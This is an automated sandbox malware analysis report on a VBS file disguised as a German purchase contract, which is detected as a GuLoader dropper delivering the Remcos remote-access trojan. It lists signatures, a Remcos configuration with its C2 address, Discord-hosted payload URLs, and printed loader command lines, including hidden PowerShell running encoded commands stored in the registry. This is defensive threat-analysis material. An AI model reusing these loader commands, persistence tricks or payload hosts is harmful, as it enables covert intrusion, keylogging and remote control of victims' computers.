Windows Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs

Overview

General Information

Sample Name: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Analysis ID: 560422
MD5: b8fbb413a49b2f05872cb38372454664
SHA1: 2071d3476c94b3cfc924b31c705806e78df674a8
SHA256: cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32

Detection

Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Remcos RAT
Detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000019.00000002.398154379475.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}
Source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "i;j49.123:2404:194.130.249.123:4687:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-WPACZI", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49829 version: TLS 1.2

Networking

Source: Malware configuration extractor URLs: https://cdn.discordapp.com/attachments/933089228261294143/9
Source: Malware configuration extractor URLs: i;j49.123
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 162.159.133.233
Source: global traffic HTTP traffic detected: GET /attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache
Source: global traffic TCP traffic: 192.168.11.20:49819 -> 94.130.249.123:2404
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png$
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB6m
Source: powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBAm
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/1s
Source: ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin&
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binb
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bing
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binn32
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binnmd
Source: ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bino
Source: ieinstal.exe, 00000011.00000002.401434029761.000000001EA64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bins
Source: ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bint
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011752798.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404217250.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpgS
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/c
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/k-?
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/p
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester$
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49829 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR

System Summary

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "
Source: Initial file: Intercompa.ShellExecute Numb5, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
Source: Initial file: Intercompa.ShellExecute Klagenspar, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3956
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3968
Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7848, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 3564, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04418028 4_2_04418028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0441801B 4_2_0441801B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0441E978 4_2_0441E978
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_070A80E8 4_2_070A80E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_070A80F8 4_2_070A80F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F2A150 4_2_07F2A150
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F273A8 4_2_07F273A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F2E368 4_2_07F2E368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F23198 4_2_07F23198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F23188 4_2_07F23188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F752C0 4_2_07F752C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F752B0 4_2_07F752B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F70040 4_2_07F70040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F70007 4_2_07F70007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F81008 4_2_07F81008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F837F8 4_2_07F837F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F837F7 4_2_07F837F7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F81F47 4_2_07F81F47
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC0040 4_2_07FC0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8798 4_2_07FC8798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8793 4_2_07FC8793
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0851F8D0 4_2_0851F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0851E1E0 4_2_0851E1E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085977F0 4_2_085977F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: String function: 085E27B8 appears 40 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A56511 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 17_2_00A56511
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A5657A NtProtectVirtualMemory, 17_2_00A5657A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A56575 NtProtectVirtualMemory, 17_2_00A56575
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC62B5 NtSetContextThread, 25_2_08FC62B5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2D3D NtWriteVirtualMemory, 25_2_08FC2D3D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309520F NtAllocateVirtualMemory, 30_2_0309520F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309657A NtProtectVirtualMemory, 30_2_0309657A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030928EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 30_2_030928EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03091DE5 NtSetInformationProcess, 30_2_03091DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03095EF7 NtProtectVirtualMemory, 30_2_03095EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03096575 NtProtectVirtualMemory, 30_2_03096575
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323520F NtAllocateVirtualMemory, 33_2_0323520F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323657A NtProtectVirtualMemory, 33_2_0323657A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03231DE5 NtSetInformationProcess, 33_2_03231DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032328EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 33_2_032328EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03235EF7 NtProtectVirtualMemory, 33_2_03235EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03236575 NtProtectVirtualMemory, 33_2_03236575
Source: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0A3.tmp" "c:\Users\user\AppData\Local\Temp\CSC1F7F6E38280547C88EA9F93164256468.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES330D.tmp" "c:\Users\user\AppData\Local\Temp\CSCED2B87455DE24E4084C3BB361169C34B.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA37.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CEBFB2B5FB1400592E8D3F6A040AE46.TMP"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220126
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2udcow1.gts.ps1
Source: classification engine Classification label: mal100.troj.evad.winVBS@36/40@1/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-WPACZI
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: Yara match File source: 00000019.00000002.398154379475.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.397021989403.0000000000A50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.398588130377.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.397158688650.0000000009330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398097409576.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
